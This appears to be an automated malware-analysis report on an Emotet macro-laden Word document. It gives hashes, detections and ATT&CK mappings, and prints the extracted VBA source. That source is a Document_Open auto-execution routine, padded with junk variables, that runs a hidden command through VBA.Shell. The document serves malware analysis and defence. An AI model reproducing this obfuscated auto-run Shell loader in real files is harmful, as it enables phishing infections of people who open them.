Emotet — Office (OOXML) malware analysis

Static analysis result for SHA-256 b99528c00d6ac14b…

MALICIOUS

Office (OOXML)

94.1 KB Created: 2019-02-27 09:22:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-03-10
MD5: db05e46e401c597860496fdc727159c6 SHA-1: 47d62c7e0c84e05ce70827781052ab77f765ea18 SHA-256: b99528c00d6ac14bf99ade801638f8deb78ba5c610ead5ca6ac68a69f95547bc
222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA macro with a Document_Open auto-execution routine. This macro utilizes the Shell() function to execute a command, likely to download and run a secondary payload. ClamAV detection identifies it as Emotet, a known downloader family.

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-6869634-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6869634-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2028 bytes
SHA-256: f575305918dae4af09886c96638f780ba1326f452b3af7db3097ac936bd8bd45
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()


Call z
End Sub

Attribute VB_Name = "ET3dl"
Sub yKhfqA()
End Sub
Public Sub z()
Dim iTF0t6MHV As Single
iTF0t6MHV = 51443.538064102
Dim TOn9lamf As Double
TOn9lamf = Sgn(24237.439338447)
Dim gWneoH
gWneoH = LCase(be7fZ)
Dim xuixBz As Integer
xuixBz = Sgn(10512)
Dim IxDeQck As Single
IxDeQck = 41379.156175635
Dim FEhAj3k As Byte
FEhAj3k = 156
Dim tpQR13NzE As Long
tpQR13NzE = -1581512616
Dim lvwYGO8j As Byte
lvwYGO8j = 126
Dim pUFqucYoV As Byte
pUFqucYoV = 29
Dim acL0N8V As Double
acL0N8V = Val(60250.226249357)
Dim QjPW5E As Byte
QjPW5E = 46
Dim vZmAM As Integer
vZmAM = Sgn(27412)
cQIhewDGN = VBA.Shell(fUvmst, 0)
End Sub

Attribute VB_Name = "UyPhS9"
Sub mxHcL1ngG()
End Sub
Sub KflrRbWZc()
End Sub

Attribute VB_Name = "M18aXQk"
Sub IfzUtDq()
End Sub
Public Function fUvmst()
Dim jewN5xGF4 As Double
jewN5xGF4 = Sgn(3.1323832915231)
Dim FoyZEO6 As Integer
FoyZEO6 = -32124
Dim yr4a0K As Object
Set yr4a0K = New fm
Dim iuALWPnso As Double
iuALWPnso = 58152.134397185
ekbswJ8C = "mxKHzoRi1SXQtVNJHsZNr2"
fUPfnbQpu = 32103 / 10701
eyOGI = -3008 + 3016
xVaEh = Mid(ekbswJ8C, fUPfnbQpu, eyOGI)
Dim rWpiO As Double
rWpiO = 40666.530738674
Dim lf6GL As Long
lf6GL = Sgn(0)
Dim qCwh456 As Boolean
qCwh456 = True
If 18045 / 45 = 1188 - 1172 Then
zJyr1Cwup = "AOBkG"
End If
fUvmst = yr4a0K.mynewtxt.Text
End Function

Attribute VB_Name = "fm"
Attribute VB_Base = "0{AA7073C8-E9EB-488D-92E5-788807E9BE1F}{2A58C9F4-1DE7-48AF-9FAB-149F610DA65B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 23552 bytes
SHA-256: 32450fa46d5667529adf066c8be6623b6a6369ac42c9fc966778f616e9562b6e